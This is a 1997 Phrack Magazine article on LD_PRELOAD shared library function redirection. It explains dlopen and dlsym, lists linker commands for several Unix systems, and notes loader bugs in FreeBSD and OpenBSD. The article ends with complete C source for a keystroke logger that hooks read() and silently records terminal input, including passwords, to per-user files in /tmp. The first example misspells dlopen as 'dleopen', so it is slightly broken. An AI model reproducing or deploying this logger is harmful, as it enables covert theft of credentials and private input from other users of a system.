| ---[ Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 08 of 17 | |
| -------------------------[ Shared Library Redirection Techniques | |
| --------[ halflife <halflife@infonexus.com> | |
| This article discusses shared libraries - in particular, a method for doing | |
| shared library based function call redirection for multiple purposes. During | |
| the process of writing some code, some bugs were discovered in a few shared | |
| library implementations, these are discussed as well. | |
| First off, a short description of shared libraries is in order. Shared | |
| libraries are designed to let you share code segments among programs. In this | |
| way, memory usage is reduced significantly. Since code segments generally are | |
| not modified, this sharing scheme works rather well. Obviously for this to | |
| work, the code segments have to be location independent or PC indepenant (ip | |
| independant for the x86 programmers in the audience). | |
| Now, since the telnetd environment variable hole, most of you know there | |
| are several environment variables that can be used to specify alternate shared | |
| libraries. Among them, on most systems, are LD_LIBRARY_PATH and LD_PRELOAD; | |
| this article strictly deals with the latter. Additionally, on Digital UNIX | |
| and Irix, this variable is called _RLD_LIST and has a slightly different | |
| syntax. | |
| Sun's shared libraries came with an API to let users load and call shared | |
| library functions; most other vendors have cloned the interface. Oddly enough, | |
| our code will not work in SunOS, although it will in Solaris2. Anyhow, the | |
| first function to be concerned with is called dlopen(). This function | |
| basically loads the shared library and mmap()s it into memory if it is not | |
| already loaded. The first argument it accepts, is a pointer to the filename | |
| to be loaded, the second argument should usually be 1 (although some platforms | |
| seem to support other options). The manpage provides more details. A handle | |
| is returned on success, you can call dlerror() to determine if a failure | |
| occurred. | |
| Once you have dlopen()ed a library, the next goal is to get the address of one | |
| or more of the symbols that are inside the library. You do this with the | |
| dlsym() function. Unfortunately, this is where things can get nonportable. | |
| On the freely available 4.4BSD machines I tested, dlsym() wants the function | |
| name prepended by a underscore character. This makes perfect sense to me, | |
| since that is how C stores function names internally. The System Vish | |
| implementations, which make up the majority of the tested systems, do not use | |
| such a convention. This, unfortunately, means you must use conditional | |
| compilation in order to ensure portability. | |
| A simple example of opening a library, getting a function and calling it is | |
| shown below: | |
| <++> sh_lib_redir_example.c | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <dlfcn.h> | |
| main() | |
| { | |
| void *handle; | |
| void (*helloworld)(void); | |
| char *c; | |
| handle = dleopen("/tmp/helloworld.so", 1); | |
| c = dlerror(); | |
| if(c) | |
| { | |
| fprintf(stderr, "couldnt open /tmp/helloworld.so\n"); | |
| abort(); | |
| } | |
| #if __FreeBSD__ | |
| helloworld = dlsym(handle, "_helloworld"); | |
| #else | |
| helloworld = dlsym(handle, "helloworld"); | |
| #endif | |
| c = dlerror(); | |
| if(c) | |
| { | |
| fprintf(stderr, "couldnt get helloworld symbol\n"); | |
| abort(); | |
| } | |
| helloworld(); | |
| dlclose(handle); | |
| } | |
| <--> | |
| Okay, now that we understand how to use the programming interface, how do we | |
| do function call redirection? Well, my idea is simple; you preload a library, | |
| the preloaded library does its thing, then it dlopen()s the real library and | |
| gets the symbol and calls it. This seems to work well on Solaris, Linux (ELF), | |
| Irix (5.3 and 6.2), FreeBSD (see bugs section below), and OSF/1 (not tested). | |
| Compiling shared libraries is a little different on each platform. The | |
| compilation stage is basically the same, it is the linking that is actually | |
| different. For GCC, you make the object with something like: | |
| gcc -fPIC -c file.c | |
| That will create file.o, object code which is suitable for dynamic linking. | |
| Then you actually have to link it, which is where the fun begins :). Here is | |
| a chart for linking in the various operating systems I have tested this stuff | |
| on. | |
| FreeBSD: ld -Bshareable -o file.so file.o | |
| Solaris: ld -G -o file.so file.o -ldl | |
| Linux: ld -Bshareable -o file.so file.o -ldl | |
| IRIX: ld -shared -o file.so file.o | |
| OSF/1: ld -shared -o file.so file.o | |
| On IRIX, there is an additional switch you need to use if you are running 6.2, | |
| it enables backwards ld compatibility; the manpage for ld is your guide. | |
| Unfortunately, all is not happy in the world of shared libs since there are | |
| bugs present in some implementations. FreeBSD in particular has a bug in that | |
| if you dlsym() something and it is not found, it will not set the error so | |
| dlerror() will return NULL. OpenBSD is far far worse (*sigh*). It | |
| initializes the error to a value, and does not clear the error when you call | |
| dlerror() so at all times, dlerror() will return non NULL. Of course, OpenBSD | |
| is incompatible with our methods in other ways too, so it does not really | |
| matter I guess :). The FreeBSD bug is hacked around by testing return values | |
| for NULL. | |
| Here is a simple TTY logger shared library example. When you preload it, it | |
| will log the keystrokes when users run any nonprivledged shared lib using | |
| program. It stores the logs in /tmp/UID_OF_USER. Pretty simple stuff. | |
| <++> tty_logger.c | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <sys/types.h> | |
| #include <sys/uio.h> | |
| #include <sys/stat.h> | |
| #include <string.h> | |
| #include <fcntl.h> | |
| #include <dlfcn.h> | |
| /* change this to point to your libc shared lib path */ | |
| #define LIB_PATH "/usr/lib/libc.so.3.0" | |
| #define LOGDIR "/tmp" | |
| int logfile = -1; | |
| static void createlog(void) | |
| { | |
| char buff[4096]; | |
| if(logfile != -1) | |
| return; | |
| memset(buff, 0, 4096); | |
| if(strlen(LOGDIR) > 4000) | |
| return; | |
| sprintf(buff, "%s/%d", LOGDIR, getuid()); | |
| logfile = open(buff, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR); | |
| return; | |
| } | |
| static void writeout(char c) | |
| { | |
| switch(c) | |
| { | |
| case '\n': | |
| case '\r': | |
| c = '\n'; | |
| write(logfile, &c, 1); | |
| break; | |
| case 27: | |
| break; | |
| default: | |
| write(logfile, &c, 1); | |
| } | |
| } | |
| ssize_t read(int fd, void *buf, size_t nbytes) | |
| { | |
| void *handle; | |
| ssize_t (*realfunc)(int, void *, size_t); | |
| int result; | |
| int i; | |
| char *c; | |
| char d; | |
| handle = dlopen(LIB_PATH, 1); | |
| if(!handle) | |
| return -1; | |
| #if __linux__ || (__svr4__ && __sun__) || sgi || __osf__ | |
| realfunc = dlsym(handle, "read"); | |
| #else | |
| realfunc = dlsym(handle, "_read"); | |
| #endif | |
| if(!realfunc) | |
| return -1; | |
| if(logfile < 0) | |
| createlog(); | |
| result = realfunc(fd, buf, nbytes); | |
| c = buf; | |
| if(isatty(fd)) | |
| { | |
| if(result > 0) | |
| for(i=0;i < result;i++) | |
| { | |
| d = c[i]; | |
| writeout(d); | |
| } | |
| } | |
| return result; | |
| } | |
| <--> | |
| ----[ EOF | |